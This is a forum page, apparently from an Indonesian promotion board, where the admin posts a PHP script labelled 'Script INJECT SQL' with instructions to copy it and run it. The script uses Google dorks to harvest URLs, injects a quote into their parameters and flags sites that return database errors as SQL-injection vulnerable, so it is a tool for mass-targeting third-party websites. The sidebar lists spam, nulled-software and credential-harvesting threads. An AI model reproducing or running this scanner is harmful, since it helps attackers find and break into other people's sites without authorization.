Promosi dan Informasi Iklan
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Pencarian
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» solusi bau mulut
Script INJECT SQL [php] EmptySun Aug 17, 2014 3:40 am by wartasolusi

» akhirnya terjawab sudah masalah saya
Script INJECT SQL [php] EmptySun Oct 28, 2012 4:31 am by stokisherbal

» solusi bau mulut, napas, kurus/obesitas, kerusakan rambut
Script INJECT SQL [php] EmptyWed Oct 17, 2012 4:18 pm by stokisherbal

» nulled CPA blaster
Script INJECT SQL [php] EmptyWed Oct 17, 2012 12:15 pm by Admin

» Script Download Mp3 dari 4Shared [White Code]
Script INJECT SQL [php] EmptySun Sep 30, 2012 12:01 pm by mandala

» Backlink Pasang Ac Surabaya | Do follow blog - Infoac.info
Script INJECT SQL [php] EmptyFri Sep 28, 2012 10:42 pm by mandala

» Backlink Service Ac Surabaya
Script INJECT SQL [php] EmptyFri Sep 28, 2012 10:37 pm by mandala

» site:perawatanac.infoac.info
Script INJECT SQL [php] EmptyWed Sep 26, 2012 1:31 am by mandala

» Auto Approve - Bakclink September 2012
Script INJECT SQL [php] EmptyThu Aug 30, 2012 10:41 pm by mandala

» pemesanan id betting online
Script INJECT SQL [php] EmptyWed Aug 29, 2012 2:40 pm by dragonbet77

» Dijual Segera Rumah Minimalis Siap Huni dan Hadap Timur | Surabaya
Script INJECT SQL [php] EmptyTue Aug 28, 2012 9:23 pm by mandala

» Get Usernames And Passwords + Database By Google
Script INJECT SQL [php] EmptySun Aug 26, 2012 12:15 pm by mandala


Script INJECT SQL [php]

Go down

Script INJECT SQL [php] Empty Script INJECT SQL [php]

Post by Admin Sun Jan 09, 2011 12:06 am

Copy paste script dibawah ini dengan menggunakan .PHP

Code:
<?php
include ("head.php");
echo "<h2>Scanner</h2>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:news.php?id='></p>";
echo "<input type='submit' value='Search'>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
    $a = 0;
    flush(); ob_flush();
    echo "Pages: [ $b ]<br />";
    echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo "Getting result from google...<br />";
    flush(); ob_flush();
   
preg_match_all("/<h2 class=(.*?)><a href="(.*?)" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
    echo "Scanning...<br />";
    flush(); ob_flush();   
while(9) {

    if(preg_match("/You have an error in your SQL','Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function','Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
        echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection vulnerable</font><br />";
    } else {
        echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Failed</font><br />";
        flush(); ob_flush();
    }
    if($a > count($sites[2])-1) {
        echo "Done<br />";
        break;
    }
    $a = $a+1;
}
    $b = $b+100;
}
}

function Connect_Host($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if($data) {
        return $data;
    } else {
        return 0;
    }
}

function Clean($text) {
    return htmlspecialchars($text, ENT_QUOTES);
}
include ("foot.php");
?>

Very Happy Very Happy
Admin
Admin
Admin
Admin

Jumlah posting : 347
Points : -2145399006
Reputation : 8
Join date : 08.11.10
Age : 37
Lokasi : Surabaya

https://promosi.indonesianforum.net

Kembali Ke Atas Go down

Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik